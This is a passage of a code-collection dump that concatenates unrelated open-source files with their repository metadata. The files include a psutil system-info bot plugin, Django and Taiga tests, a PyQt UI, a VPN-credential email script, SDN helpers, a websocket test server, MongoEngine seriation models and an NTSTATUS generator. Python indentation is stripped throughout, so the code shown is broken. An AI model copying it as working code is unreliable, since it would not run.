msg = "CPU usage (%s)\n" % self.current_datetime()
for cpu in cpu_info.keys():
info = cpu_info[cpu]
msg += """ %s
--------
User: %s %%
System: %s %%
Idle: %s %%\n\n""" % (
cpu.upper(), str(info["user"]), str(info["system"]),
str(info["idle"]))
return self.feedback(msg, sender, src)
@Message(tags=["disk"])
def info_disk(self, sender, src):
""" Send basic information on disk usage by jabber or Telegram. """
disk_info = self.gather_disk()
msg = "Disk usage (%s)\n" % self.current_datetime()
for disk in disk_info.keys():
info = disk_info[disk]
usage = disk_info[disk]["usage"]
msg += """ %s
--------
Mount point: %s
Filesystem type: %s
Options: %s
Usage:
- Total: %s
- Used: %s
- Free: %s
- Percentage used: %s %%\n\n""" % (
disk, info["mountpoint"], info["fstype"], info["opts"],
self.size_fmt(usage["total"]),
self.size_fmt(usage["used"]),
self.size_fmt(usage["free"]),
str(usage["percentage"]))
return self.feedback(msg, sender, src)
@Message(tags=["mem"])
def info_memory(self, sender, src):
""" Send basic information on memory usage by jabber or Telegram. """
mem_info = self.gather_memory()
msg = "Memory usage (%s)\n" % self.current_datetime()
for mem_type in mem_info.keys():
info = mem_info[mem_type]
msg += """ %s
--------
Total: %s
Free: %s
Used: %s
Percentage used: %s %%\n\n""" % (
mem_type,
self.size_fmt(info["total"]),
self.size_fmt(info["free"]),
self.size_fmt(info["used"]),
str(info["percentage"]))
return self.feedback(msg, sender, src)
def attach_html(self, html):
""" Build the attachment file.
This file is stored in the directory specified in
ZOE_HOME/etc/sysinfo.conf (the directory must exist previously)
"""
now = datetime.today()
filename = "sysinfo_%s_%s_%s_%s_%s_%s.html" % (
str(now.day), str(now.month), str(now.year),
str(now.hour), str(now.minute), str(now.second))
b64 = base64.standard_b64encode(bytes(html, 'utf-8')).decode('utf-8')
return zoe.Attachment(b64, "text/html", filename)
def current_datetime(self):
""" Return the current date and time in human-readable format. """
now = datetime.today()
return now.strftime("%d/%m/%Y - %H:%M:%S")
def feedback(self, data, user, dst):
""" Send feedback to the user
data -- may be text or an attachment for e-mail
user -- user to send the feedback to
dst -- either 'jabber', 'tg' or 'mail'
"""
to_send = {
"dst": "relay",
"relayto": dst,
"to": user
}
if dst == "jabber" or dst == "tg":
to_send["msg"] = data
else:
to_send["html"] = data.str()
to_send["subject"] = "System information report"
return zoe.MessageBuilder(to_send)
def gather_cpu(self):
""" Gather information on system CPU.
Obtains usage percentage for each CPU present for user,
system and idle.
"""
result = {}
cpu_info = psutil.cpu_times_percent(percpu=True)
for index, cpu in enumerate(cpu_info):
result["cpu" + str(index)] = {
"user": cpu.user,
"system": cpu.system,
"idle": cpu.idle
}
return result
def gather_disk(self):
""" Gather information on system disks.
Obtains mounted disk partitions and their usage statistics.
"""
result = {}
partitions = psutil.disk_partitions(all=True)
for partition in partitions:
part_usage = psutil.disk_usage(partition.mountpoint)
result[partition.device] = {
"mountpoint": partition.mountpoint,
"fstype": partition.fstype,
"opts": partition.opts,
"usage": {
"total": part_usage.total,
"used": part_usage.used,
"free": part_usage.free,
"percentage": part_usage.percent
}
}
return result
def gather_memory(self):
""" Gather information on system memory.
Obtains physical RAM and swap statistics.
"""
result = {}
mem_info = psutil.virtual_memory()
swap_info = psutil.swap_memory()
result["ram"] = {
"total": mem_info.total,
"free": mem_info.available,
"used": mem_info.used,
"percentage": mem_info.percent
}
result["swap"] = {
"total": swap_info.total,
"free": swap_info.free,
"used": swap_info.used,
"percentage": swap_info.percent
}
return result
def gather_proc(self):
""" Gather information on running processes.
Obtains pid, name, executable, user running the process,
status of the process and memory usage.
"""
result = {}
for proc in psutil.process_iter():
try:
process = psutil.Process(proc.pid)
proc_data = process.as_dict(
attrs=["name", "exe", "username", "status"])
mem_info = process.memory_info()
proc_data["memory"] = {}
proc_data["memory"]["resident"] = mem_info.rss
proc_data["memory"]["virtual"] = mem_info.vms
result[proc.pid] = proc_data
except psutil.NoSuchProcess:
continue
return result
def size_fmt(self, num):
""" Represents amount of bytes in a better human-readable way.
Obtained from http://stackoverflow.com/a/1094933
"""
for unit in ['B','KiB','MiB','GiB','TiB','PiB','EiB','ZiB']:
if abs(num) < 1024.0:
return "%3.1f %s" % (num, unit)
num /= 1024.0
return "%.1f %s" % (num, 'YiB')
|
mit
| 5,714,891,798,546,808,000 | 29.83208 | 80 | 0.482361 | false |
futurice/django-jsonmodel
|
test/test_human.py
|
1
|
1642
|
from django.test import TestCase
from django.core.urlresolvers import reverse
from djangojsonmodel.convert import jsmodels
from djangojsonmodel.contrib.human.mappings import shortnames
from djangojsonmodel.contrib.human.urls import drf
from .urls import urlpatterns
from .urls_api import router
from pprint import pprint as pp
MAPPING = {
'BooleanField':'text',
'CharField':'text',
'DateTimeField':'datetime',
'DecimalField':'text',
'EmailField':'text',
'ForeignKey':'fk',
'ForeignObjectRel':'fk',
'IntegerField':'text',
'ManyToManyField':'m2m',
'TextField':'textarea',
'ChoiceField':'select',
}
def get_field(fields, name):
return list(filter(lambda x: x['name']==name, fields))[0]
class HumanTest(TestCase):
def test_human_shortnames(self):
out = jsmodels(applications=['test',])
out = shortnames(out, mapping=MAPPING)
self.assertTrue(
filter(lambda x: 'short_name' in x,
out['models']['Person']['fields']))
for field in out['models']['Person']['fields']:
if field['field'] == 'CharField':
self.assertEquals(field['short_name'], 'text')
def test_human_urls(self):
self.assertTrue(reverse('person-list'))
self.assertTrue(reverse('person-detail', kwargs=dict(pk=1)))
out = jsmodels(applications=['test',], prepare=False)
out = drf(out)
f = get_field(out['models']['Account']['fields'], 'person')
self.assertEqual(f['url']['id'], '/api/account/:id')
f = get_field(out['models']['Account']['fields'], 'name')
self.assertEqual(f['url']['id'], '/api/account/:id')
|
mit
| -5,252,892,620,313,928,000 | 30.576923 | 68 | 0.644945 | false |
gkunter/coquery
|
coquery/gui/ui/findWidgetUi.py
|
1
|
2751
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'findWidget.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FindWidget(object):
def setupUi(self, FindWidget):
FindWidget.setObjectName("FindWidget")
FindWidget.resize(1040, 102)
self.horizontalLayout = QtWidgets.QHBoxLayout(FindWidget)
self.horizontalLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.button_find_close = QtWidgets.QToolButton(FindWidget)
icon = QtGui.QIcon.fromTheme("window-close")
self.button_find_close.setIcon(icon)
self.button_find_close.setObjectName("button_find_close")
self.horizontalLayout.addWidget(self.button_find_close)
self.label = QtWidgets.QLabel(FindWidget)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.edit_find = QtWidgets.QLineEdit(FindWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.edit_find.sizePolicy().hasHeightForWidth())
self.edit_find.setSizePolicy(sizePolicy)
self.edit_find.setObjectName("edit_find")
self.horizontalLayout.addWidget(self.edit_find)
self.button_find_next = QtWidgets.QPushButton(FindWidget)
icon = QtGui.QIcon.fromTheme("go-down")
self.button_find_next.setIcon(icon)
self.button_find_next.setObjectName("button_find_next")
self.horizontalLayout.addWidget(self.button_find_next)
self.button_find_prev = QtWidgets.QPushButton(FindWidget)
icon = QtGui.QIcon.fromTheme("go-up")
self.button_find_prev.setIcon(icon)
self.button_find_prev.setObjectName("button_find_prev")
self.horizontalLayout.addWidget(self.button_find_prev)
self.horizontalLayout.setStretch(2, 1)
self.retranslateUi(FindWidget)
QtCore.QMetaObject.connectSlotsByName(FindWidget)
def retranslateUi(self, FindWidget):
_translate = QtCore.QCoreApplication.translate
FindWidget.setWindowTitle(_translate("FindWidget", "Form"))
self.button_find_close.setText(_translate("FindWidget", "..."))
self.label.setText(_translate("FindWidget", "Find:"))
self.button_find_next.setText(_translate("FindWidget", "Next"))
self.button_find_prev.setText(_translate("FindWidget", "Previous"))
|
gpl-3.0
| 5,910,999,480,630,010,000 | 46.431034 | 102 | 0.708833 | false |
zaxlct/python-django-learning
|
SendMail/通过SSL发送邮件.py
|
1
|
1172
|
# coding:utf-8
#!/usr/bin/env python
import smtplib,datetime,sys
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
username = sys.argv[1]
passwd = sys.argv[2]
_user = "oa@eycode.com"
_pwd = "密码"
_to_list = ["%s@eycode.com"%username]
msg = MIMEMultipart()
# 设置邮件编码
msg["Accept-Language"] = "zh-CN"
msg["Accept-Charset"] = "ISO-8859-1,utf-8"
# 邮件标题
msg["Subject"] = u"VPN信息,请注意保密"
msg["From"] = _user
msg['to'] = ','.join(_to_list)
# 内容部分
part = MIMEText("""
你好 \n
你的VPN帐号已经开通正常 \n
帐号:%s \n
密码:%s \n
压缩包密码:imay \n
使用教程请看附件 \n
""" % (username,passwd) ,_charset="utf-8")
msg.attach(part)
# 附件部分
part = MIMEApplication(open("VPN.rar",'rb').read())
part.add_header('Content-Disposition', 'attachment', filename="VPN.rar")
msg.attach(part)
# 使用SSL协议进行发送邮件
server = smtplib.SMTP_SSL()
server.connect("smtp.exmail.qq.com", 465)
server.login(_user, _pwd)
server.sendmail(_user, _to_list, msg.as_string())
server.close()
|
mit
| -3,474,270,333,641,462,300 | 20.5 | 72 | 0.67345 | false |
haidlir/drox
|
lib.py
|
1
|
4946
|
# The MIT License (MIT)
# Copyright (c) 2015 haidlir
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This component stores libraries for the application.
"""
from __future__ import print_function
from bucket import bucket
def curr_to_capacity(curr):
capacity = {
1 : 10.,
2 : 10.,
4 : 100.,
8 : 100.,
16 : 1000.,
32 : 1000.,
64 : 10000.
}
# return capacity[127 & curr]
return 100. # for TC in mininet
class PortDetail(object):
def __init__(self, index, name, port_no, state, capacity):
self.index = index
self.name = name
self.port_no = port_no
self.state = state
self.capacity = capacity
self.upload = 0
self.__name__ = name
def set_load(self, load = 0):
self.upload = load
def _repr__(self):
return "%s:%s:(%s/%sMbps)" % (self.name, self.port_no, self.upload,
self.capacity)
class LinkDetail(object):
def __init__(self, dpid, capacity, interface):
self.dpid = dpid
self.capacity = capacity
self.interface = interface
# self.update_load()
def update_load(self):
self.load = bucket.port_info[self.dpid][self.interface].upload
# self.metric = self.calc_metric()
# print(self.__repr__())
def calc_metric(self):
return 10**2/(self.capacity-self.load)
def residual_capacity(self):
return self.capacity-self.load
def __repr__(self):
return "capacity= %s; load = %s; metric = %s" % (self.capacity,
self.load,
self.metric)
class ARPDets(object):
def __init__(self, dpid, port, mac_addr, time = 0):
self.dpid = dpid
self.port = port
self.mac_addr = mac_addr
# self.time = time
class OneWayPath(object):
def __init__(self, path, source):
self.path = path
self.source = source
# self.metric = self.calc_metric()
def calc_metric(self):
temp_metric = 0
for i in range(len(self.path)):
if i == 0:
temp_metric = bucket.matrix_adj[self.source][self.path[i]].metric
else:
temp_metric += bucket.matrix_adj[self.path[i-1]][self.path[i]].metric
return temp_metric
def get_metric(self):
return self.calc_metric()
def calc_metric_SNH(self):
temp_metric = 0
for i in range(len(self.path)):
if i == 0:
metric_of_this_pair = bucket.matrix_adj[self.source][self.path[i]].residual_capacity()
temp_metric = metric_of_this_pair
else:
metric_of_this_pair = bucket.matrix_adj[self.path[i-1]][self.path[i]].residual_capacity()
if temp_metric > metric_of_this_pair:
temp_metric = metric_of_this_pair
return temp_metric
def get_metric_SNH(self):
return self.calc_metric_SNH()
class FlowEntry(object):
def __init__(self, nw_src, nw_dst, nw_proto, tp_src, tp_dst, in_port, out_port, path = [], **opts):
self.nw_src = nw_src
self.nw_dst = nw_dst
self.nw_proto = nw_proto
self.tp_src = tp_src
self.tp_dst = tp_dst
self.in_port = in_port
self.out_port = out_port
self.path = path
if 'dpid' in opts:
self.initial_dpid = opts['dpid']
else:
self.initial_dpid = bucket.arp_table[nw_src].dpid
self.bps = 0.
self.byte_count = 0.
def __repr__(self):
return "%s:%s >%s> %s:%s |%s| %s Mbps" % (self.nw_src, self.tp_src,\
self.nw_proto, self.nw_dst, \
self.tp_dst, self.path, self.bps/10.**6)
|
mit
| 212,829,334,784,592,700 | 33.587413 | 105 | 0.573797 | false |
dayatz/taiga-back
|
tests/integration/test_totals_projects.py
|
1
|
5868
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2017 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014-2017 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2017 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2017 Anler Hernández <hello@anler.me>
# Copyright (C) 2014-2017 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# Copyright (C) 2014-2017 Taiga Agile LLC <taiga@taiga.io>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pytest
import datetime
from .. import factories as f
from taiga.projects.history.choices import HistoryType
from taiga.projects.models import Project
from django.core.urlresolvers import reverse
from django.utils import timezone
pytestmark = pytest.mark.django_db
def test_project_totals_updated_on_activity(client):
project = f.create_project()
totals_updated_datetime = project.totals_updated_datetime
now = timezone.now()
assert project.total_activity == 0
totals_updated_datetime = project.totals_updated_datetime
us = f.UserStoryFactory.create(project=project, owner=project.owner)
f.HistoryEntryFactory.create(
project=project,
user={"pk": project.owner.id},
comment="",
type=HistoryType.change,
key="userstories.userstory:{}".format(us.id),
is_hidden=False,
diff=[],
created_at=now - datetime.timedelta(days=3)
)
project = Project.objects.get(id=project.id)
assert project.total_activity == 1
assert project.total_activity_last_week == 1
assert project.total_activity_last_month == 1
assert project.total_activity_last_year == 1
assert project.totals_updated_datetime > totals_updated_datetime
totals_updated_datetime = project.totals_updated_datetime
f.HistoryEntryFactory.create(
project=project,
user={"pk": project.owner.id},
comment="",
type=HistoryType.change,
key="userstories.userstory:{}".format(us.id),
is_hidden=False,
diff=[],
created_at=now - datetime.timedelta(days=13)
)
project = Project.objects.get(id=project.id)
assert project.total_activity == 2
assert project.total_activity_last_week == 1
assert project.total_activity_last_month == 2
assert project.total_activity_last_year == 2
assert project.totals_updated_datetime > totals_updated_datetime
totals_updated_datetime = project.totals_updated_datetime
f.HistoryEntryFactory.create(
project=project,
user={"pk": project.owner.id},
comment="",
type=HistoryType.change,
key="userstories.userstory:{}".format(us.id),
is_hidden=False,
diff=[],
created_at=now - datetime.timedelta(days=33)
)
project = Project.objects.get(id=project.id)
assert project.total_activity == 3
assert project.total_activity_last_week == 1
assert project.total_activity_last_month == 2
assert project.total_activity_last_year == 3
assert project.totals_updated_datetime > totals_updated_datetime
totals_updated_datetime = project.totals_updated_datetime
f.HistoryEntryFactory.create(
project=project,
user={"pk": project.owner.id},
comment="",
type=HistoryType.change,
key="userstories.userstory:{}".format(us.id),
is_hidden=False,
diff=[],
created_at=now - datetime.timedelta(days=380)
)
project = Project.objects.get(id=project.id)
assert project.total_activity == 4
assert project.total_activity_last_week == 1
assert project.total_activity_last_month == 2
assert project.total_activity_last_year == 3
assert project.totals_updated_datetime > totals_updated_datetime
def test_project_totals_updated_on_like(client):
project = f.create_project()
f.MembershipFactory.create(project=project, user=project.owner, is_admin=True)
totals_updated_datetime = project.totals_updated_datetime
now = timezone.now()
assert project.total_activity == 0
now = timezone.now()
totals_updated_datetime = project.totals_updated_datetime
us = f.UserStoryFactory.create(project=project, owner=project.owner)
l = f.LikeFactory.create(content_object=project)
l.created_date=now-datetime.timedelta(days=13)
l.save()
l = f.LikeFactory.create(content_object=project)
l.created_date=now-datetime.timedelta(days=33)
l.save()
l = f.LikeFactory.create(content_object=project)
l.created_date=now-datetime.timedelta(days=633)
l.save()
project.refresh_totals()
project = Project.objects.get(id=project.id)
assert project.total_fans == 3
assert project.total_fans_last_week == 0
assert project.total_fans_last_month == 1
assert project.total_fans_last_year == 2
assert project.totals_updated_datetime > totals_updated_datetime
client.login(project.owner)
url_like = reverse("projects-like", args=(project.id,))
response = client.post(url_like)
project = Project.objects.get(id=project.id)
assert project.total_fans == 4
assert project.total_fans_last_week == 1
assert project.total_fans_last_month == 2
assert project.total_fans_last_year == 3
assert project.totals_updated_datetime > totals_updated_datetime
|
agpl-3.0
| -8,717,044,814,042,567,000 | 35.203704 | 82 | 0.701449 | false |
vlegoff/tsunami
|
src/primaires/perso/montrer/__init__.py
|
1
|
1990
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Package contenant un objet destiné à montrer des informations.
Par exemple, vous trouverez dans ce package le module score et la classe
MontrerScore, destinée à montrer le score d'un personnage. L'intérêt de
passer par des classes (simple conteneurs, méthodes statiques) est que l'on
peut utiliser la même classe pour afficher différents scores (celui d'un
PNJ, d'un joueur, d'un familier, de soi-même).
"""
|
bsd-3-clause
| -8,451,832,110,852,041,000 | 49.769231 | 79 | 0.781313 | false |
cgqyh/pyalgotrade-mod
|
testcases/websocket_server.py
|
1
|
1284
|
import threading
from wsgiref import simple_server
from ws4py.server import wsgirefserver
from ws4py.server import wsgiutils
class WebSocketServerThread(threading.Thread):
def __init__(self, host, port, webSocketServerClass):
super(WebSocketServerThread, self).__init__()
self.__host = host
self.__port = port
self.__webSocketServerClass = webSocketServerClass
self.__server = None
def run(self):
def handler_cls_builder(*args, **kwargs):
return self.__webSocketServerClass(*args, **kwargs)
self.__server = simple_server.make_server(
self.__host,
self.__port,
server_class=wsgirefserver.WSGIServer,
handler_class=wsgirefserver.WebSocketWSGIRequestHandler,
app=wsgiutils.WebSocketWSGIApplication(handler_cls=handler_cls_builder)
)
self.__server.initialize_websockets_manager()
self.__server.serve_forever()
def stop(self):
self.__server.shutdown()
# webSocketServerClass should be a subclass of ws4py.websocket.WebSocket
def run_websocket_server_thread(host, port, webSocketServerClass):
wss_thread = WebSocketServerThread(host, port, webSocketServerClass)
wss_thread.start()
return wss_thread
|
apache-2.0
| -4,481,928,351,619,121,000 | 33.702703 | 83 | 0.679907 | false |
clipo/idss-seriation
|
seriation/database.py
|
1
|
10460
|
#!/usr/bin/env python
# Copyright (c) 2015. Mark E. Madsen <mark@madsenlab.org>
#
# This work is licensed under the terms of the Apache Software License, Version 2.0. See the file LICENSE for details.
"""
Description here
"""
from mongoengine import *
from seriation import idss_version
import datetime
import logging as logger
def get_file_location_keys():
return sorted([k for k,v in SeriationFileLocations._fields.iteritems()])
class SeriationFileLocations(EmbeddedDocument):
# files used by IDSS.py itself
inputfile = StringField()
xyfile = StringField()
pairfile = StringField()
mstfile = StringField()
shapefile = StringField()
metadatafile = StringField()
frequencyvnafile = StringField()
frequencypairsvnafile = StringField()
frequencymstvnafile = StringField()
frequencymstdistvnafile = StringField()
frequencypointsshapefile = StringField()
frequencyatlasfile = StringField()
frequencyexceltxtfile = StringField()
frequencyexcelwookbookfile = StringField()
frequencysumgraphbyweightgmlfile = StringField()
frequencysumgraphbyweightshapefile = StringField()
frequencysumgraphbyweightvnafile = StringField()
frequencysumgraphbyweightpngfile = StringField()
frequencysumgraphbycountpngfile = StringField()
frequencysumgraphbycountgmlfile = StringField()
frequencyminmaxbyweightpngfile = StringField()
frequencyminmaxbyweightgmlfile = StringField()
frequencygeosignificancefile = StringField()
frequencymstpngfile = StringField()
contsumgraphfile = StringField()
contmstminfile = StringField()
contminmaxweightgml = StringField()
contminmaxcountgml = StringField()
continuityexceltxtfile = StringField()
continuityexcelworkbookfile = StringField()
continuityatlasfile = StringField()
continuityvalidseriationsatlasfile = StringField()
continuityuniquevalidseriationsatlasfile = StringField()
continuityvalidseriationsexceltxtfile = StringField()
continuityvalidseriationsexcelworkbookfile = StringField()
continuitygeosignificancefile = StringField()
continuitysumgraphbyweightpngfile = StringField()
continuitysumgraphbyweightgmlfile = StringField()
continuitysumgraphbycountpngfile = StringField()
continuitysumgraphbycountgmlfile = StringField()
continuityminmaxbyweightpngfile = StringField()
continuityminmaxbyweightgmlfile = StringField()
# files created by analysis scripts
# annotation in seriationct
annotatedfreqminmaxbyweightgmlfile = StringField()
annotatedfreqminmaxbyweightdotfile = StringField()
annotatedfreqminmaxbyweightpngfile = StringField()
annotatedcontminmaxbyweightgmlfile = StringField()
annotatedcontminmaxbyweightdotfile = StringField()
annotatedcontminmaxbyweightpngfile = StringField()
class SeriationRunParameters(EmbeddedDocument):
bootstrap_ci_flag = BooleanField()
bootstrap_significance = FloatField()
spatial_significance = BooleanField()
spatial_bootstrap_n = IntField()
xyfile_path = StringField(required=True)
inputfile = StringField(required=True)
outputdirectory = StringField(required=True)
continuity_seriation = BooleanField()
frequency_seriation = BooleanField()
full_cmdline = StringField()
class SeriationProfilingData(EmbeddedDocument):
bootstrap_ci_processing_time = FloatField()
total_frequency_processing_time = FloatField()
freq_main_processing_time = FloatField()
freq_spatial_processing_time = FloatField()
freq_output_processing_time = FloatField()
freq_minmaxweight_processing_time = FloatField()
freq_sumgraphweight_processing_time = FloatField()
freq_filter_processing_time = FloatField()
freq_excelmacro_processing_time = FloatField()
freq_excel_processing_time = FloatField()
freq_atlas_processing_time = FloatField()
freq_mst_processing_time = FloatField()
total_continuity_processing_time = FloatField()
total_occurrence_processing_time = FloatField()
class FrequencySeriationResult(EmbeddedDocument):
max_solution_size = IntField()
total_number_solutions = IntField()
spatial_significance_pvalue = FloatField()
class OccurrenceSeriationResult(EmbeddedDocument):
pass
class ContinuitySeriationResult(EmbeddedDocument):
spatial_significance_pvalue = FloatField()
class MinmaxSolutionMetrics(EmbeddedDocument):
"""
Scores or metrics from minmax seriation solutions
"""
score_chronological_accuracy = FloatField()
num_branch_points = IntField()
mean_degree = FloatField()
class SeriationRun(Document):
total_runtime = FloatField()
parameters = EmbeddedDocumentField(SeriationRunParameters)
profiling = EmbeddedDocumentField(SeriationProfilingData)
frequency_results = EmbeddedDocumentField(FrequencySeriationResult)
continuity_results = EmbeddedDocumentField(ContinuitySeriationResult)
occurrence_results = EmbeddedDocumentField(OccurrenceSeriationResult)
file_locations = EmbeddedDocumentField(SeriationFileLocations)
minmax_metrics = EmbeddedDocumentField(MinmaxSolutionMetrics)
version_used = StringField(required=True)
seriation_run_id = StringField(required=True)
num_assemblages = IntField()
num_classes = IntField()
date_seriation_run = DateTimeField(default=datetime.datetime.now)
source_identifier = StringField()
meta = {'allow_inheritance': True}
#TODO: Index the table to make annotation easy
class SeriationDatabase(object):
"""
persistence connection to the MongoDB database server
into which SeriationRun metadata, and in the future, primary
output, are stored.
"""
def __init__(self, args):
self.args = args
connect(db = args.database,
host = args.dbhost,
port = args.dbport,
username = args.dbuser,
password = args.dbpassword)
def store_run_metadata(self, stats_map, fileMap):
"""
Saves the metadata for a single seriation run. Parameter
subdocument is constructed from the command line args held
by the object, and the stats_map argument is a dictionary
returned by the seriate() method which contains timing
and solution statistics
:param stats_map :
"""
if self.args.xyfile == None:
xyfile = "none"
else:
xyfile = self.args.xyfile
floc = SeriationFileLocations()
#logger.debug("fileMap: %s", fileMap)
for fkey in fileMap.keys():
floc.__setattr__(fkey, str(fileMap[fkey]))
params = SeriationRunParameters()
params.inputfile = self.args.inputfile
params.bootstrap_ci_flag = bool(self.args.bootstrapCI)
params.bootstrap_significance = self.args.bootstrapSignificance
params.spatial_bootstrap_n = self.args.spatialbootstrapN
params.spatial_significance = bool(self.args.spatialsignificance)
params.xyfile_path = xyfile
params.outputdirectory = self.args.outputdirectory
params.continuity_seriation = bool(stats_map["continuity"])
params.frequency_seriation = bool(stats_map["frequency"])
params.full_cmdline = stats_map["cmdline"]
profile = SeriationProfilingData()
if 'bootstrap_ci_processing_time' in stats_map:
profile.bootstrap_ci_processing_time = stats_map["bootstrap_ci_processing_time"]
if 'frequency_processing_time' in stats_map:
profile.total_frequency_processing_time = stats_map['frequency_processing_time']
profile.freq_main_processing_time = stats_map['freq_main_processing_time']
profile.freq_filter_processing_time = stats_map['frequency_filter_solutions_time']
profile.freq_sumgraphweight_processing_time = stats_map["sumgraphweight_processing_time"]
profile.freq_output_processing_time = stats_map["frequency_output_processing_time"]
profile.freq_minmaxweight_processing_time = stats_map["minmax_weight_processing_time"]
if 'spatial_processing_time' in stats_map:
profile.freq_spatial_processing_time = stats_map["spatial_processing_time"]
if 'continuity_processing_time' in stats_map:
profile.total_continuity_processing_time = stats_map["continuity_processing_time"]
if 'occurrence_processing_time' in stats_map:
profile.total_occurrence_processing_time = stats_map["occurrence_processing_time"]
if 'mst_processing_time' in stats_map:
profile.freq_mst_processing_time = stats_map["mst_processing_time"]
if 'atlas_processing_time' in stats_map:
profile.freq_atlas_processing_time = stats_map["atlas_processing_time"]
if 'excel_processing_time' in stats_map:
profile.freq_excel_processing_time = stats_map["excel_processing_time"]
if 'excel_freqseriation_processing_time' in stats_map:
profile.freq_excelmacro_processing_time = stats_map["excel_freqseriation_processing_time"]
srun = SeriationRun()
srun.parameters = params
srun.profiling = profile
srun.file_locations = floc
srun.total_runtime = stats_map['execution_time']
srun.version_used = idss_version.__version__
srun.seriation_run_id = stats_map['seriation_run_id']
srun.num_assemblages = stats_map["num_assemblages"]
srun.num_classes = stats_map["num_classes"]
srun.source_identifier = self.args.source_identifier
# add the results from various seriation types
if self.args.frequency == 1:
freqres = FrequencySeriationResult()
freqres.max_solution_size = stats_map['max_seriation_size']
freqres.total_number_solutions = stats_map['total_number_solutions']
if 'frequency_geographic_pvalue' in stats_map:
freqres.spatial_significance_pvalue = stats_map['frequency_geographic_pvalue']
srun.frequency_results = freqres
if self.args.continuity == 1:
contres = ContinuitySeriationResult()
if 'continuity_geographic_pvalue' in stats_map:
contres.spatial_significance_pvalue = stats_map['continuity_geographic_pvalue']
srun.continuity_results = contres
# persist the entire set of results
srun.save()
|
apache-2.0
| -8,235,923,105,254,227,000 | 36.625899 | 119 | 0.711663 | false |
yogendersolanki91/winfsp
|
tools/gensrc/ntstatus.py
|
2
|
3934
|
#!/usr/bin/python
import sys
pairs = []
for line in sys.stdin:
pairs.extend(line.strip().split())
pairs = zip(pairs[::2], pairs[1::2])
fixed = {
'ERROR_ACCESS_DENIED': 'STATUS_ACCESS_DENIED',
'ERROR_CANNOT_IMPERSONATE': 'STATUS_CANNOT_IMPERSONATE',
'ERROR_CONNECTION_ABORTED': 'STATUS_CONNECTION_ABORTED',
'ERROR_CTX_LICENSE_NOT_AVAILABLE': 'STATUS_CTX_LICENSE_NOT_AVAILABLE',
'ERROR_DRIVER_BLOCKED': 'STATUS_DRIVER_BLOCKED',
'ERROR_EA_LIST_INCONSISTENT': 'STATUS_EA_LIST_INCONSISTENT',
'ERROR_FILE_INVALID': 'STATUS_FILE_INVALID',
'ERROR_HOST_UNREACHABLE': 'STATUS_HOST_UNREACHABLE',
'ERROR_INTERNAL_ERROR': 'STATUS_INTERNAL_ERROR',
